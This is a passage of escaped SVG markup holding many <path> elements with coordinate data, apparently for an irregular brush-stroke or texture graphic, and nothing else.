d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n        <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n        <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n        <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n        <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n        <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n        <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n        <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n        <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n        <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n        <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n        <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n        <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n        <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n        <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n        <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n        <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n        <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n        <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n        <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n        <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n        <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n        <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n        <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n        <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n        <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n        <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n        <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n        <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n        <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n        <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n        <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n        <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n        <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n        <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n        <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n        <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n        <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n        <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n        <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n        <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n        <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n        <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n        <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n        <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n        <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n        <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n        <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n        <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n        <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n        <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n        <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n        <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n        <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n        <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n        <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n        <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n        <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n        <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n        <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n        <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n        <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n        <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n        <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n        <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n        <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n        <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n        <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n        <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n        <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n        <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n        <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n        <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n        <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n        <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n        <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n        <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n        <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n        <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n        <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n        <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n        <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n        <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n        <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n        <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n        <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n        <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n        <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n        <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n        <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n        <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n        <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n        <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n        <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n        <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n        <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n        <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n        <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n        <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n        <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n        <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n        <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n        <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n        <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n        <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n        <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n        <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n        <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n        <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n        <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n        <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n        <path 